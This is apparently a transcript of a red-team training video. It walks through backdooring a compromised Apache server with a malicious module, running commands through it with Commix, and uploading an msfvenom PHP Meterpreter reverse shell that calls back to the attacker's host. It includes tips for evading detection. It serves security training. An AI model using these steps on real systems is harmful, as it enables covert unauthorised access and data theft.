Hello everyone, welcome back to the Red Team training series. In this video, we are going to be taking a look at Linux rootkits, or more specifically rootkits, right? Now, rootkits are a technique that fall under the attack or the MITRE ATT&CK framework defense evasion tactic. As we've already seen, and in the previous video we touched upon the process of hiding Linux processes and how that can be facilitated. The objective with rootkits now is to set up a covert clandestine access for the attacker, and of course we are the attacker. So the scenario is going to remain the same. We have a target Linux system that we have exploited and have obtained root access on, and now our job is to set up a rootkit so that we can again have a system of persistence set up so that we can constantly have access whenever we need it through a covert channel. Remember, we don't want to be SSHing into the box regardless of whether we have the credentials or not. The objective here is to set up our persistence, our entry vector or access vector as clandestinely as possible, or as securely as possible without tripping any alarms. That being said, what will we be covering in this video? So we'll talk about rootkits and what they are, and then we'll get into the practical aspect of this video where we will talk about setting up an Apache2 rootkit. We'll get into command injection with Commix, and then I'll take you through the process of obtaining a reverse shell with Meterpreter so that you can again obtain access whenever you require it, and again you don't have to use any overt channels of authentication or for interacting with the target like SSH. Now, so what is a rootkit in the terms of cybersecurity? Well, a rootkit is a clandestine computer program that's designed to provide continued privileged access to a computer while actively hiding its presence. Rootkits are typically utilized as part of the defense evasion tactic and are set up after an initial foothold has been obtained. So again, the process of setting up a rootkit on a target system will of course depend on whether or not you've been able to obtain an initial foothold on the target system, and in some cases you will require privileged access. However, in this particular case, we will be taking a look at a rootkit that doesn't require privileged access and is extremely clandestine. Now, I just want to make something as clear as possible. The type of rootkit you utilize will depend on the target configuration and what your requirements are. So in this case, our target, as we know, is a Linux server that's set up to host a website for the company that we've just attacked. And our job is to set up a backdoor, or rather a rootkit that can provide us with a backdoor whenever we require access, right? And the parameters under which our rootkit will fall, or the parameters that our rootkit must meet, are: number one, it should not interact with the kernel or the hypervisor that's being used. So we're not talking about ring 3 or ring 2 rootkits. Secondly, it needs to be as clandestine as possible, and any security analysts or administrators should not again be able to detect it using any anti-detection systems or intrusion detection or prevention systems. And again, the primary objective of our rootkit is to maintain some form of clandestine access for the attacker, and of course, in this particular case, the attacker is us. So when we talk about the defense evasion tactic and where rootkits fall in, you can actually see the technique ID there. It essentially provides the following description. So again, adversaries utilize rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting or hooking and modifying operating system API calls that supply information, right? Now, in our case, as I said, we're not going to be touching upon, essentially analyzing or interacting with the kernel and essentially having our rootkit, actively hide our processes, hide our exploitation artifacts. We're going to be focused on just having a system of access that we can use whenever we want, similar to a backdoor. That being said, let's actually move on to the practical aspect of this video. So I'll see you on my Kali VM. Alright, so I'm back on my Kali VM, and I'm currently on, I've logged into the target system via SSH, and of course this is something that we want to eliminate in some way. And we are going to be using an Apache rootkit, and again, this GitHub repository will be in the description section. and the documentation for this video, so you can actually again check it out for yourself. So it works fairly simply. The way it works, you can see it's a malicious Apache module with rootkit functionality, right? And it's developed in C. And again, this is essentially an Apache module that we again set up or configure to run with Apache, so that we can actually again utilize it for command injection on the target system. And as I'll demonstrate later on, command injection can be quite useful primarily because we can spawn a reverse shell whenever we need to do that. So again, you can see that it'll provide us with the C code for the Apache module. And again, the reason we're using Apache here is again based on our scenario, right? So our target is running a web server and it's utilizing the LAMP stack, and part of the LAMP stack is the Apache web server, or the Apache web server technology, or stack rather. And again, what we're going to be doing is we first need to clone the repository. We then need to compile the Apache module with APXS, which is again a package that we can install on the target, or again, it's part of a larger package, but we can then utilize it to compile the Apache module for us. We can then modify the Apache2 configuration file and load that particular module. In this case, the module is called authg module. And again, the location for accessing this module on the web server will be under authg. And again, I'll explain how this works exactly. So the first thing we want to do is we want to clone the repository. And I'm just going to do that under my temp directory. So cd tmp. And what we'll do now is we'll just clone it here. So I'm just going to say git clone, and we'll paste it. We'll paste the link in there. That's going to clone Apache Rootkit. Before we do that, we need to install the Apache module compilation tools, or the Apache2 dev package, which again contains all of these utilities. So that can be done by saying sudo apt get install Apache2 dev, right? And that's going to install it for us. It's about 32 megabytes. So again, this is going to take a few seconds to a few minutes. So I'm just going to wait for this to complete installing. So it's going to take a while to actually set up all the various tools and utilities. And once this is done, we can actually move on to the next step. All right, so the package has completed installing. So the next step now will be to actually take a look at the code. So again, we can analyze it here. So Apache Rootkit, and you can see we have the Apache module C code. And again, what we can do is let's actually open it up in Vim, and I'm just going to say mod authg.c, and it'll give you the documentation for the module. And again, you can get rid of the you can actually get rid of the documentation here, but it works fairly simply. It essentially takes in arguments that we provide and processes them as a system or operating system command, and then displays the output to us in our browser. Alternatively, we can utilize the command injection functionality to actually run, arbitrary commands that can provide us with information that we're looking for, or furthermore, we can actually utilize it to spawn a reverse shell. That being said, you can see it's a fairly simple module, and again, you can customize it based on your own requirements. And again, it is recommended to actually customize this so that any rootkit anti-rootkit solutions installed on the target system will not be able to pick it up, because Linux anti-rootkit systems primarily work on a signature basis. However, in this particular case, we'll just stick to the default configuration here. So I'm just gonna exit without making any changes. And again, to compile it, we're going to be using APXS. So if we say, what is APXS? We can see that it's the Apache extension tool that again will allow us to compile the module automatically. So we're going to say APXS. And we're then going to use the C and I flags and specify the actual module code here. So mod authg.c, and we want to hit enter. Don't worry if it throws out any errors. These errors are common in this particular case and are related to particular, as you can see right over here, are related to particular issues with functions and various allocations. Now that we have that done, one key thing that you need to take note of here is the libraries folder, or the libraries, the actual directory where the Apache module has actually been saved to, or have actually been installed to. And again, this the authg module, the mod authg Apache module, is not going to be saved within the Apache modules directory, the default one. So I'm just going to copy that directory because we'll need it shortly, and I'll just paste it in there. So typically Apache modules, custom Apache modules are stored within etc Apache, Apache2, and then if I say, let's just list out the contents of this directory. We have the modules that have actually been enabled, the ones available, so on and so forth. But we actually need to specify within the Apache configuration file that the authg module is under userlib Apache2 module. So if we list out the contents of this particular directory, and we head over to the top, you can now see it's going to be right over here. So mod authg.so, right? And everything looks fine there. And what we need to do now is we need to actually edit the Apache configuration file. So I'm going to use vim. We'll say etc apache apache2.conf, and we can then add our custom, we can actually load the module within this file, but again, I would recommend doing it somewhere that again is not accessed frequently, so probably at the end of the file or somewhere in the middle of the file. However, in this case, just to keep things nice and simple, I'm just going to do it right over here at the top of the file. And again, to essentially enable a particular module or to load it, we can say load module, and then we specify the module that we want to load. So we say authg module, and then we specify the directory where that module is actually saved. In this case, we'll copy the userlib Apache2 modules directory, paste that in there, and then we need to provide the name of the module. So in this case, the name of the module is mod authg.so. And again, we can then go ahead and start configuring the location for the web server and how this particular module can be accessed. So we'll say location, and location is going to be authg. You can change this to whatever you want based on your parameters. And then we're going to set the handler, and we're going to set the handler to authg, and then we can then close up the location specification here. And that is pretty much it in regards to actually customizing or adding the module to our Apache configuration file. So if we just head back to the GitHub repository, you can see that we've followed the instructions fairly well, and everything seems to be okay to this point. The way we can test whether this is working is by restarting the Apache service. And this is the target website, so you can see it's running a simple PHP Bootstrap 4 website here. And again, this will provide us with a good opportunity to take a look at how we can utilize a website or a default website installation to again set up our rootkit. So once we save and we say systemctl restart Apache2, you can see it restarted without giving us any errors, which means it's working. And the way we can test this now is by heading over to the web server, and we can then perform some basic command injection by saying authg. Remember, that is the actual location and the controller. So we then say command is equal to, and then we can execute arbitrary Linux commands or operating system commands. So for example, if we wanted to display our current user, we can type in who am I, and you can see it displays it here on the web server data. So we know that command injection is working, and there's various things we can do. For example, cat etc password. That will display the contents of the password file here and will give us an idea of the users on the system. However, in our case, this is not our vector of our initial access vector. This is going to work as a backdoor. So you may be asking yourself the question, how can we utilize this as our backdoor? Well, we will be utilizing a tool called Commix, and Commix comes pre-packaged on Kali. If it's not, you can install it by typing in sudo apt get install Commix, right? And I should already have it installed here. There we are. So you can see Commix is set up. And what Commix is essentially a a simple environment or framework that can be utilized by web developers, penetration testers, or security researchers to test web applications to find bugs like this one. And it can also be used to exploit command injection vulnerabilities. So one of the great features of Commix is that it allows us to actually utilize or obtain a pseudo terminal or a pseudo shell using the simple command injection vulnerability, and then execute commands that way. And remember, this is not being done through SSH, or it's not being done through any overt channel of communication or interaction. It's being done clandestinely through Apache. So for example, if we wanted to run Commix, I'll just type in Commix and we'll open up the help menu here. It's a fairly advanced tool, and I'm going to be covering some of the important pieces of functionality that can be utilized. So again, you can open up the help option or the help menu there. And in our case, it's going to be fairly simple. We're testing the site, or we're testing the target site for command injection, which we know it is vulnerable to. So we can say Commix, and then we type in the URL flag, and then we pass in the URL here. In our case, it's 192.168.2.100, and then we provide the actual command injection specification here. So we say auth G, and then of course that's our controller, so that we can say C, and that is equal to ID. So that's just a test parameter, right? And we hit enter. I'm going to hit no to resume, and you can see it's going to ask you whether we actually want a pseudo terminal shell. You can actually see that command injection is successful. Testing the results-based classic command injection technique, the get parameter C seems injectable. So we can hit yes for a pseudo terminal shell, and voila, we have a shell on the target system, and we can view the available options in terms of the commands that we can run like so. So for example, if I type in ls, it'll list out the contents of the root of the Linux file system. So you can see we have all the directories there. I can also type in ID, for example. You can see it displays our current user, which is www.data, but that's not a problem, because again, if you have obtained initial access to the target system and you have gathered credentials, then you should be able to elevate your privileges by simple authentication. However, as you can see, that this is not quite comprehensive or as useful as a standard reverse shell or a Meterpreter reverse shell, right? So we need to actually set up a way of actually utilizing command injection to get obtain a Meterpreter session on the target system. And again, we will be utilizing the LAMP stack. So again, we'll utilize Apache, PHP, etc. But you can see that this actually provides us with a great way of interacting with the target, without having to log in or without having to use any exploits. That being said, what we can do, I'll just run a few other commands here. So for example, cat etc password. You can see that it will display all the data, but it doesn't display it in a format that's readable. So that's another reason why we actually may want to get a classic reverse shell or a Meterpreter session on the target system. Now, Commix already has options to spawn a reverse TCP shell, but we are going to be using Meterpreter just to show you that this actually can be quite useful, and you can again chain your attacks to actually provide you with very useful utility like a Meterpreter session on the target system, and then establish a form of persistence, so on and so forth. Right, so to do that, what we're going to need to do now is we need to actually generate our payload, and our payload is going to be a PHP payload that we will upload to the web server with Commix. And what we'll do is, I'm just going to terminate that. We're going to upload it to the web server with Commix, and of course it needs to be a PHP file. If we head over to the target and we head over into the var www.html folder, which is where the website is set up, and I list out the contents of this particular directory, you can see that we have various folders. Now, I could just upload our payload, our PHP payload, to the root of the directory. But if you're trying to be as clandestine as possible, you can again upload it to any of these folders here. So for example, I could upload it to CSS, and I can upload it here. I can upload it to any other folder. I can also create my own folders, right? And again, this will need to be done with an understanding of you know, how frequently these particular files are being changed, how frequently the website is being updated, so on and so forth. So let's actually generate our PHP payload with MSF Venom. So we are going to say MSF Venom, and we are then going to say P for payload, and then we're going to say PHP and Meterpreter reverse TCP. We then want to set our lhost option, which is in this case going to be our Kali IP, or in your case, your command and control center. So 192.168.2.21. The L port will set to 1234 just to keep things nice and simple. And then we're also going to encode it with base 64. So we're going to say encoder PHP base 64. And then the format is going to be raw. And we will output this onto our desktop under shell.php. And we'll hit enter. And that's going to generate our PHP payload for us. So again, we're going to give this a few seconds. There we are. You can see that it's going to complete it, and PHP base 64 encoding is also successful. If I open up the file here, just open up the file. So I'm going to say open, head over to desktop and shell.php. There it is. We're going to open that up. You can see it's been encoded. It has been encoded in base 64. What we need to do now, as you can see, it lacks the standard PHP syntax, so we actually need to add it. So we are again going to say we need to provide the PHP syntax here. So I'm going to say PHP at the beginning of the file. Sorry, let me just type that in correctly. So PHP and then I'm just going to close the PHP tag here. So again, we're just going to say PHP. Well, sorry, I'm typing that incorrectly. We're just going to say like so. And we can then save it. So I'm going to save that, and we can get rid of this file here. Don't save. So we now need to use Commix to get this uploaded onto the target, right? And the directory we choose to use will, again, as I said, depend on what type of web framework is being used for the website, whether it's a content management system, etc., etc. So I'll just start up MSF console and set up our listener so that we can actually receive the reverse connection when that payload is executed. So I'll say use multi-handler, set the payload to PHP Meterpreter reverse TCP, show options, set the lhost to the Kali IP, set the L port to the option we specified during the process of generating the payload. In that case, it was 1234. We hit run, and the listener is now running. So it's going to start the reverse TCP handler for us. And now we can actually take a look at how to transfer over the payload onto the root of the web server using Commix. And of course, we're leveraging the command injection vulnerability provided or facilitated by our Apache Rootkit. All right, so in order to upload a file with Commix, we are going to need to specify a few more options whenever we run our check with Commix. But of course, we already know that we can exploit the code injection or command injection vulnerability. So again, I'm just going to use the previous command here. And again, we've specified the URL. We now need to specify that we want to write a file, and the file is saved on our desktop. So that's very important. But to, again, specify the file that we want to write, we're going to say file, and we then say write, and then we specify the actual file that we want to write onto the target and its path, or the path to that particular file. In this case, it's home, Kali desktop, and it's called shell.php, right? And we're going to encapsulate that in single quotes. Once that is done, we also need to provide the destination where we want to save shell.php on the target. So again, this is going to depend on your particular scenario. But again, if I list out the contents of var www.html, sorry, type that in there, we can again save it to the root and rename it under something else like config.php if we want, something really clandestine. But in this case, I'm just going to upload it to the root because, again, as I said, it's not really important where I save it. I can still access it regardless. So right, I'm going to then specify the file destination, which is, again, can be done by saying file and then we say DEST, which is file destination, and then we specify the directory, which is var www.html, and then the file to save it as, or the file name to actually save this file as. We'll just stick to shell.php, and we can then simply just hit enter, right? So I'm going to hit enter. I'm not going to resume, and let's see whether that is successful. You can see that it's going to tell us here that the shell.php file was created successfully, and it's going to ask us whether we want a sudo terminal shell. I'm going to hit no. And do you want to continue testing with the classic command injection techniques? I'm just going to hit no, and we can just terminate that there because we've already transferred the file. We can confirm that we've transferred the file by again just listing out the contents, and you can see we have shell.php there, and it's saved in the root of the web server. So what we're going to do, just to simulate a real scenario here, let's say we've lost SSH access, or the password has been changed for the root user, or whatever the case, you've lost overt access to the target. So I'm just going to exit, log out of SSH now, and all I need to do now to exploit or to run the payload is just access it from the web server. So all I need to do is just say shell.php, hit enter. I take a look at my listener, and I've obtained a Meterpreter session on the target system. So again, I can type in sysinfo, and you can see it'll provide us with all the relevant information there. And again, we can go about setting up a system of persistence either through a cron job or whatever the case. But I just wanted to highlight this as it is quite useful. And again, if you don't want to upload a PHP payload that again will provide you with a Meterpreter session, you can stick with the sudo shell that again Commix provides you with, and you can again utilize that for whatever activities you need to perform. But as I said, this again provides you with a great way of maintaining access to the target system, and again it does it as clandestinely as possible, in the sense that you're not interacting with SSH, or you're not authenticating with SSH, so that information is not being logged. Again, this is all happening under Apache, so again you're not interfering with any other system services. The web server again is working just fine. We can again navigate to other web pages, other users can access the site, so on and so forth. So yeah, I just wanted to take you through the process of setting up a very, very useful rootkit that again is as clandestine as possible and can provide us with great access vectors either through Commix or through a Meterpreter reverse shell. That being said, that's going to be it for this video, and I will be seeing you in the next video. A huge thank you to all of our Patreons. Your support is greatly appreciated, and this is a formal thank you. So thank you Shamir Douglas, Ryan Carr, Sandor, Michael Busby, Sid Saab, Doozy, Tafim Bari, Dustin Umpress, and Michael Hubbard. Your support is greatly appreciated, and you keep us making even more high quality content for you guys. So thank you.